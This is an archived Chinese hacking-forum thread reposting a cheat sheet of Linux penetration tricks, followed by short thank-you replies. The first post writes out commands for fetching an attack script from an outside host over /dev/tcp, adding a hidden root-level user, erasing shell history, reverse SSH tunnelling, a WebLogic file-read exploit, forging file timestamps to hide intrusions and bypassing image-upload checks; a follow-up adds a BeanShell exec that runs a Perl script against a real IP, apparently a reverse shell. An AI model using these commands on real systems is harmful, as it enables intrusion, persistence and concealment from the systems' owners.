Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 13335|Reply: 89

[转载] linux常用渗透小技巧 By:cnbird

    [Copy URL]
Posted 2010-6-20 18:28:37 | Show all replies |Read Mode
1.无wget nc等下载工具时下载文件
  1. exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl
Copy
2.Linux添加uid为0的用户
  1. useradd -o -u 0 cnbird
Copy
3.bash去掉history记录
  1. export HISTSIZE=0
  2. export HISTFILE=/dev/null
Copy
4.SSH反向链接
  1. ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p
Copy
指定远端服务器SSH端口,然后服务器上执行ssh localhost -p 44即可
5.weblogic本地读取文件漏洞
  1. curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml” http://server/wl_management_internal2/wl_management
Copy
6.apache查看虚拟web目录
  1. ./httpd -t -D DUMP_VHOSTS
Copy
7.cvs渗透技巧
  1. CVSROOT/passwd UNIX SHA1的密码文件
  2. CVSROOT/readers
  3. CVSROOT/writers
  4. CVS/Root
  5. CVS/Entries 更新的文件和目录内容
  6. CVS/Repository
Copy
8.Cpanel路径泄露
  1. /3rdparty/squirrelmail/functions/plugin.php
Copy
9.修改上传文件时间戳(掩盖入侵痕迹)
  1. touch -r 老文件时间戳 新文件时间戳
Copy
10.利用baidu和google搜索目标主机webshell
  1. intitle:PHPJackal 1t1t
Copy
11.包总补充
创建临时“隐藏”目录
  1. mkdir /tmp/…
Copy
/tmp/…目录在管理员有宿醉的情况下是“隐藏”的,可以临时放点exp啥的
12.利用linux输出绕过gif限制的图片
  1. printf “GIF89a\x01\x00\x01\x00” > poc.php
Copy
Weblogin Script Tool(WLST)
写入到\\config\\config.xml
1.进行修改:
  1. \wlserver_10.0\server\bin\setWLSenv.sh
Copy
2.启动WLST
  1. java weblogic.WLST
  2. wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
  3. wls:/bbk/serverConfig> help()
  4. wls:/bbk/serverConfig> edit()
  5. wls:/bbk/serverConfig> cd(‘Servers’)
  6. wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)
  7. wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)
  8. wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
  9. wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ‘4′)
  10. wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
  11. wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change
  12. wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
  13. wls:/offline> exit()
Copy
3.批处理:
保存以上命令为cnbird.py
  1. connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
  2. cd(‘Servers’)
  3. cd(‘Log’)
  4. cd(‘Server-cnbird’)
  5. startEdit()
  6. set(‘FileCount’, ‘4′)
  7. save()
Copy
然后执行
  1. java weblogic.WLST cnbird.py
Copy
 Author| Posted 2010-6-20 18:41:38 | Show all replies
刚刚跟他聊天,他说又更新了:
日期:2010/6/20
YoCo Smart 18:11:08
似乎好久没见你上线了
cnb|rd 18:11:34
是啊大概半年了
YoCo Smart 18:11:47
真猛啊
YoCo Smart 18:12:50
linux常用渗透小技巧 By:cnbird
这文章很强悍,收藏了哈
cnb|rd 18:13:02
呵呵谢谢
cnb|rd 18:13:14
十三:beanshell渗透技巧
exec("/usr/bin/perl /var/tmp/c.pl 218.56.57.151 53");
实例:网易多台beanshell漏洞咋不发布,等漏洞修补发布
cnb|rd 18:13:17
又更新了


我没找到他更新在哪。。。谁找到了有奖哈
grubby The user has been deleted
Posted 2010-6-21 19:58:23 | Show all replies
学习了……
白开水 The user has been deleted
Posted 2010-6-21 20:11:26 | Show all replies
收藏先......
chinvo The user has been deleted
Posted 2010-7-2 14:46:51 | Show all replies
学习。。。
123456 The user has been deleted
Posted 2012-4-22 13:02:59 | Show all replies
感谢大哥无私分享技术!!!
铭轩7 The user has been deleted
Posted 2012-4-22 18:40:30 | Show all replies
收藏ING
worm The user has been deleted
Posted 2012-8-7 16:58:07 | Show all replies
不错到东东,学习了!!!
pumpkinhacker The user has been deleted
Posted 2012-8-8 09:11:41 | Show all replies
学习了!!
Poorworks The user has been deleted
Posted 2012-8-8 22:26:33 | Show all replies
美得一下!!
hchc0834 The user has been deleted
Posted 2012-8-27 20:58:22 | Show all replies
.................还要弄回复.....但是做为备份不错...
Posted 2012-8-28 14:39:31 | Show all replies
看看。。。。
dingmandmq The user has been deleted
Posted 2012-8-28 15:34:34 | Show all replies
收藏学习。。
glym The user has been deleted
Posted 2012-10-6 12:52:29 | Show all replies
学习了,很不错的文章
allriseforme The user has been deleted
Posted 2012-10-6 17:49:33 | Show all replies
还有隐藏的东西
controler The user has been deleted
Posted 2013-3-7 13:31:10 | Show all replies
看隐藏的
charming The user has been deleted
Posted 2013-3-7 15:49:59 | Show all replies
学习大牛思路,努力提升自我!
downtemp The user has been deleted
Posted 2013-3-9 10:14:44 | Show all replies
看看,为什么隐藏啊
gale The user has been deleted
Posted 2013-3-10 13:25:18 | Show all replies
隐藏啥拉????
rooooot The user has been deleted
Posted 2013-3-10 16:04:18 | Show all replies
看看隐藏什么
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-2-27 16:53

© 2001-2014 Silic Corp.

Quick Reply Top Return List